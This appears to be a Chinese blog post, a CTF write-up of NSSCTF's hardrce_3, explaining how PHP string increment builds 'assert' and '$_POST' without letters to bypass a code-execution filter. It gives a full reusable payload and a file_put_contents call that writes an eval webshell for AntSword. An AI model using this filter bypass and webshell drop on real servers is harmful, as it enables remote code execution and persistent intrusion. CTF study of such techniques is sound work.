无字母RCE--自增绕过

最新推荐文章于 2024-07-26 23:04:18 发布
最新推荐文章于 2024-07-26 23:04:18 发布
阅读量451 收藏 14
点赞数 4
分类专栏: NSSCTF RCE 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75120258/article/details/138137477
版权
NSSCTF 同时被 2 个专栏收录
24 篇文章 0 订阅
订阅专栏
RCE
2 篇文章 0 订阅
订阅专栏

关于自增

自增(Increment)通常指的是将某个值增加一个固定的增量。在编程中,自增通常用于循环计数、迭代或者更新变量的值等情况。

在许多编程语言中,自增操作可以通过使用 ++ 符号来完成。例如,在C语言中,++ 操作符可以用于将变量的值增加1。

例如:

<?php
     $_++;

这儿我们对$_变量进行了自增操作,但是我们没有给变量$_进行定义值,那么php会自己给$_赋一个默认的值NULL==0

可以发现,我们对$_进行了自增操作,最开始他的默认值是0,进行自增后他的值就为1了。

因此,当我们在不能使用数字的情况下,我们可以通过对未定义变量进行自增操作来得到我们想要的数字

"A"++ ==> "B"
"B"++ ==> "C"

如果我们有字母A的话,那我们就可以通过自增自减,得到我们所需要的字母。

但问题就是,没有字母怎么办呢,我们要怎么才能得到一个字母A呢

在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为"Array"。再取这个字符串的第一个字母,就可以获得"A"。

<?php
$a = ''.[];
var_dump($a);

<?php
$_=[].'';   // 将空数组转换为字符串,得到"Array",赋值给变量$_
$___ = $_[$__];   // 从$_中获取索引为$__的字符,由于$__没有定义,默认为0,因此$___得到"A"
$__ = $___;   // 将$___的值赋给$__,现在$__的值也是"A"
$_ = $___;   // 将$___的值赋给$_,现在$_的值也是"A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   // 得到"S",现在$__的值为"S"
$___ .= $__;   // 将$__追加到$___后面,现在$___的值为"AS"
$___ .= $__;   // 再次将$__追加到$___后面,现在$___的值为"ASS"
$__ = $_;   // 将$_的值赋给$__,现在$__的值为"A"
$__++;$__++;$__++;$__++;   // 得到"E",现在$__的值为"E"
$___ .= $__;   // 将$__追加到$___后面,现在$___的值为"ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;   // 得到"R",现在$__的值为"R"
$___ .= $__;   // 将$__追加到$___后面,现在$___的值为"ASSER"
$__++;$__++;   // 得到"T",现在$__的值为"T"
$___ .= $__;   // 将$__追加到$___后面,现在$___的值为"ASSERT"
$__ = $_;   // 将$_的值赋给$__,现在$__的值为"A"
$____ = "_";   // 定义变量$____为"_"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   // 得到"P",现在$__的值为"P"
$____ .= $__;   // 将$__追加到$____后面,现在$____的值为"_P"
$__ = $_;   // 将$_的值赋给$__,现在$__的值为"A"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   // 得到"O",现在$__的值为"O"
$____ .= $__;   // 将$__追加到$____后面,现在$____的值为"_PO"
$__++;$__++;$__++;$__++;   // 得到"S",现在$__的值为"S"
$____ .= $__;   // 将$__追加到$____后面,现在$____的值为"_POS"
$__++;   // 得到"T",现在$__的值为"T"
$____ .= $__;   // 将$__追加到$____后面,现在$____的值为"_POST"
$_ = $$____;   // 将$_POST赋值给$_

 因此我们在写题时,就可以通过自增操作得到POST传参,执行RCE

//测试发现7.0.12以上版本不可使用
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

固定格式:通过自增构造出来的等于assert($_POST[_]);

[SWPUCTF 2021 新生赛]hardrce_3

打开环境,进行代码审计,是无字母RCE,并且也过滤了异或和取反,那就只能进行自增绕过了

//测试发现7.0.12以上版本不可使用
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

固定格式:通过自增构造出来的等于assert($_POST[_]);

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

我们构造url:

url/?wllm=$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

然后我们在POST传参传入:

_=phpinfo();

看到他过滤了很多,但没有过滤 file_put_contents函数,那我们就利用file_put_contents函数构造POST传参一句话木马,然后用蚁剑连接

构造POST传参:

_=file_put_contents('2.php','<?php eval($_POST[1]);?>'); 

 使用蚁剑连接,得到flag

是小航呀~
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
字母RCE
qq_64201116的博客
06-23 1749
字母RCE你到底有多懂,看了也许会更进一步
字母数字rce总结(自增、取反、异或、或、临时文件上传)
whale_waves的博客
02-29 1791
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
字母数字RCE
yourdawntown的博客
09-06 2022
版本为php5 php5中assert是一个函数,我们可以通过f=′assert′;f='assert';f=′assert′;f(…);这样的方法来动态执行任意代码。 但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。 无数字和字母rce 测试代码 <?php if(!preg_match('/[a-z0-9]/is',
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
RCE极限挑战
shinygod的博客
11-23 852
RCE极限挑战
leetcode耗时-RCE-Pipeline:RCE-管道
07-01
因此,您可能使用过 HackerRank 和 Leetcode 等在线编码平台,您可以在其中编写代码,然后提交代码以供执行。 这是 RCE 的图片,它是当您提交代码以供执行时将调用的服务。 它是如何工作的? 客户端应用程序通过 API...
log4j-rce-payload
04-15
经测试验证可用lport1389,userip是攻击ip即payload存放地,webport攻击机闲置可访问的web端口,执行成功反弹即显示Send LDAP reference result for a redirecting to http://xxx:xx/Exploit.class ...
WordPress-RCE-EXP
04-10
WordPress-RCE-EXP影响版本漏洞编号:CVE-2016-10033 (基于)WordPress <= 4.7.1PHPMailer < 5> <目标站存在的用户名>Python3 wp_rce_exp.py http://127.0.0.1/ admin0x2漏洞利用出现Test_blind_shell>>>后,...
Topic-JP-512-rce-fw
11-21
Topic_JP-512_rce-fw Topic_JP-512_rce-fw Topic_JP-512_rce-fw
字母数字RCE与LD_PRELOAD绕disable_functions
D.MIND 的博客
04-19 1160
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
无数字字母rce总结(取反、异或、自增、临时文件)
东隅的博客
09-27 7566
无数字字母rce的知识点、poc、exp(取反、异或、自增、临时文件)
php无字母数字rce绕过基础操作
Welcome To Myon'Blog !
10-10 651
在php中,反引号可以直接命令执行系统命令,反引号的作用是命令替换,将其中的字符串当成shell命令执行,返回命令的执行结果。反引号包括的字符串必须是能执行的shell命令,如果不是则会出错。当关键字 "php" 被过滤了之后,此时我们便不能使用了,但是我们可以用另外两种短标签进行绕过,并且在短标签中的代码不需要使用分号(;> 是为了闭合前面的php语句,后面则为执行命令的语句。url中的+表示空格,而要表示+号必须得用%2B,即URL编码。星号”*”指代任意字符数,问号“?
一些RCE的汇总
qaq517384的博客
11-23 1077
无参数rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果
PHP常见函数漏洞
Elite的博客
04-11 2873
常见的PHP特性(bug)总结,干货满满哦
BUUCTF一道无字母数字RCE题目
m0_74989372的博客
08-16 246
接下来到了绕过disable_function阶段,在蚁剑的工具里有绕过的插件(插件市场里挂vpn下载),选择模式运行后会自动打开一个虚拟终端,此时运行readflag文件即可得到flag。换一种思路,构造我们动态调用的地方,第一个小括号内为_GET的取反,也就是说$_就相当于_GET,下图的含义为$_GET[__]($_GET[___]);此时我们拥有了__和___两个可以动态调用的点,接下来传参,第二个数值在括号里面,所以可以用eval,测试木马发现可以执行。换用phpinfo()试试。
代码执行漏洞-无字母数字RCE-create_function()
qq_51550750的博客
02-14 1085
代码执行漏洞 eval()函数 <?php eval($_POST[0]);?> eval会把接收到的字符串当作PHP代码来执行(一句话木马) 利用这个可以连接蚁剑,而连接密码就是中括号中的值–$_POST[0]中就是这个‘0’作为连接密码 无字母数字RCE 苛刻条件的 RCE 取反 、 异或 的绕过方法 比如下面的例子: 异或的方法: XOR.php 执行就是 终端 php XOR.php 利用PHP7的特性—动态函数执行调用: 如果是system(ls)—一次是system
字母RCE绕过(取反,异或,自增,通配符)
最新发布
2301_80307383的博客
07-26 565
利用php中数组与字符串强制链接,数组会强制转化为Array这个字符,在通过+号来得到我们所需要的字符。但链接上蚁剑后,由于有disable_functions里面的flag文件无法读取,找的别人的wp。取反用法就是对我们想要执行的语句通过取反符号"~"先准备好取反编码后语句,在通过(~)异或“^”,通过该符号可以通过二进制异或操作将两个字符拼接为一个。和 @ 01000000。规则:1^1=0,1^0=1,0^1=1,0^0=0。code=(语句1)(语句2)();
NSS刷题--无参数RCE自增RCE的学习
qq_75120258的博客
05-14 732
打开界面,什么都没有,看一下源代码,直接访问hintRCE,进行代码审计,检查 $rce 的长度是否不超过 120 个字符。检查 $rce 是否是一个字符串类型使用正则表达式检查 $rce 中是否包含某些特殊字符。如果 $rce 满足上述条件,则使用 eval 函数执行 $rce 中的代码。考无参数RCE,并且过滤了^和~,不能使用取反与异或,那就只能使用自增了使用祖传playload看一看它显示太长了,那就换种形式,我们构造参数,再上传参数,以达到减少长度的目的。
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞在ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最新版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.csdn.net/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.csdn.net/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值